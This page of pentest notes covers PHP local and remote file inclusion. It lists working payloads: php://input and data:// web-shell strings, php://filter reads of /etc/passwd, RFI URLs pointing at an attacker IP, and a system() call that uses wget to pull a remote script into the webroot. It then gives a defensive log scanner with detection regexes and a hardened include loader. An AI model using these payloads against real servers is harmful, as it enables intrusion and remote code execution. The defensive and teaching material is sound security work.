akde/infosec

Information security is ultimately about managing risk


  • Check to execute PHP code
  • Check URI handlers
  • Check compose
  • file_get_contents(…)
  • If there is a remote file inclusion vulnerability with require or require_once like
    require_once($basePath."/inc/mysql.php"); <--- RFI

    then provide a file locally which executes PHP and reference this like server_file.php?basePath=http://192.168.119.158/aha.php?

  • Download from remote a file which can be executed later:
    <?php system("/usr/local/bin/wget http://$attackerip/r.php -O /usr/local/www/apache24/data/r.php") ?>

Local file inclusion and Wrappers

General: if reading a PHP file returns nothing, request it base64-encoded (php://filter/convert.base64-encode) so the source comes back instead of being executed!

  • Execute a command via the input filter
    index.php?page=php://input&cmd=ls
    • Other method via the data wrapper, from hacktricks:
      index.php?lang=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz4==&cmd=ls
      • This base64 = <?php system($_GET['cmd']); ?>
  • Read a file via the resource filter:
    index.php?page=php://filter/resource=admin.php
    • The output could be filtered, especially when it is PHP. Try direct conversions instead:
      index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
      index.php?page=php://filter/write=string.rot13/resource=example.txt
  • Read process information:
    ?lang=/proc/$pid/cmdline // see proc article!
  • Try to write into php://fd/2, which is stderr: if you can access a log, you may be able to execute PHP code there.
  • Force another MIME format like index.php?file=data:text/plain,cleartext, which can be used with other MIME types to bypass filters.
  • See here for a list of PHP handlers which could also work on other systems.
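For the detection side of the wrapper tricks listed above, here is an added example (not from the original notes) of a small PHP CLI scanner that URL-decodes each request target from an Apache-style access log and flags the php://, data:, remote-URL and /proc/ patterns. The log lines are constructed samples, and the rule names and regexes are my own assumptions, not a standard.

```php
<?php
// Added example: flag LFI/RFI wrapper usage in access-log lines.
// Sample log lines below are constructed; rule names/regexes are assumptions.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?lang=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz4%3D&cmd=ls HTTP/1.1" 200 77 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /index.php?lang=/proc/self/cmdline HTTP/1.1" 200 61 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /server_file.php?basePath=http://192.0.2.10/aha.php? HTTP/1.1" 500 0 "-" "curl/8.0"
LOG;

/** Detection rules (assumed names), applied to the URL-decoded request target. */
const RULES = [
    'php_wrapper'    => '#(^|[=&/])php://(filter|input|fd)#i',         // php://filter, php://input, php://fd/N
    'data_wrapper'   => '#[=&]data:(//)?[a-z0-9.+-]+/[a-z0-9.+-]+[;,]#i', // data:text/plain,... / data://...;base64,
    'remote_include' => '#[?&][a-z_]+=(https?|ftp)://#i',                // parameter carrying a remote URL
    'proc_read'      => '#[=&]/proc/(self|\d+)/#',                       // /proc/<pid>/... reads
];

/** Extract the request target ("/index.php?page=...") from a combined-format line. */
function requestTarget(string $line): ?string
{
    return preg_match('#"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"#', $line, $m) ? $m[1] : null;
}

/** Decode percent-encoding repeatedly (max 3 rounds) so double-encoded payloads surface. */
function normalizeTarget(string $target): string
{
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($target);
        if ($decoded === $target) {
            break;
        }
        $target = $decoded;
    }
    return $target;
}

/** Names of all rules that match the (already normalized) target. */
function matchRules(string $target): array
{
    $hits = [];
    foreach (RULES as $name => $regex) {
        if (preg_match($regex, $target) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Scan a whole log text; returns one finding per line that triggered a rule. */
function scanLog(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $idx => $line) {
        $target = requestTarget($line);
        if ($target === null) {
            continue;
        }
        $hits = matchRules(normalizeTarget($target));
        if ($hits !== []) {
            $findings[] = ['line' => $idx + 1, 'target' => $target, 'rules' => $hits];
        }
    }
    return $findings;
}

// Use the constructed sample when run interactively; otherwise scan whatever is piped in.
$input = stream_isatty(STDIN) ? SAMPLE_LOG : stream_get_contents(STDIN);
foreach (scanLog($input) as $f) {
    printf("line %d  %-16s %s\n", $f['line'], implode(',', $f['rules']), $f['target']);
}
```

Run it as `php lfi_scan.php < access.log`. On the sample, line 1 is silent and lines 2 to 5 fire php_wrapper, data_wrapper, proc_read and remote_include respectively. The remote_include rule will also catch legitimate redirect or callback parameters that carry URLs, so tune it per application before alerting on it.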

Remote file inclusion

  • It could be possible to request third-party content, which we could provide:
    index.php?page=http://$our_ip/s.php?cmd=ls
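To show the fix for both the require_once($basePath."/inc/mysql.php") pattern in the first list and the remote-include case directly above, here is an added example (not from the original notes) of the vulnerable form next to a hardened page loader. The directory layout, the page map and the function names are assumptions made for the example; str_starts_with() needs PHP 8.0 or newer.

```php
<?php
// Added example: request-controlled include (as in the notes) next to a
// hardened replacement. PAGE_DIR, PAGES and function names are assumptions.
declare(strict_types=1);

// --- Vulnerable form: the path prefix comes straight from the request, so
// --- $basePath=http://host/ turns it into an RFI (with allow_url_include=On)
// --- and $basePath=php://filter/... or /proc/... into an LFI / source leak.
function loadConfigVulnerable(string $basePath): void
{
    require_once($basePath . "/inc/mysql.php");   // do not do this
}

// --- Hardened form: the request supplies only a key; the key selects a file
// --- from a fixed map, and the resolved path is verified to live inside the
// --- intended directory before anything is included.
const PAGE_DIR = __DIR__ . '/pages';            // assumed layout
const PAGES = [                                 // allowlist: key => file name
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Absolute path for an allowlisted page key, or null if the key is unknown or
 * the file resolves outside PAGE_DIR (symlinks included).
 */
function resolvePage(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                                   // unknown key: nothing is included
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);
    if ($base === false || $path === false) {
        return null;                                   // directory or file missing
    }
    // realpath() never returns a wrapper URL and has collapsed any ../ segments;
    // the prefix check guarantees the file is a descendant of PAGE_DIR.
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

function loadPage(string $key): void
{
    $path = resolvePage($key);
    if ($path === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    require_once $path;
}

// php.ini settings that remove the remote-include primitive entirely; the
// allowlist above is still needed against local inclusion and source disclosure:
//   allow_url_include = Off
//   allow_url_fopen   = Off        ; unless the application needs it elsewhere
//   open_basedir      = /var/www/app:/tmp

loadPage($_GET['page'] ?? 'home');
```

The important property is that no byte of the request ever becomes part of an include path: the key is only used as a lookup into PAGES, so php://, data:, http:// and /proc/ values are rejected before realpath() is even consulted. The realpath() prefix check is defence in depth for the case where the map is later replaced by something more dynamic.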

PHP deserialization

If a program accepts a serialized object which uses a magic method, then… TODO, see here
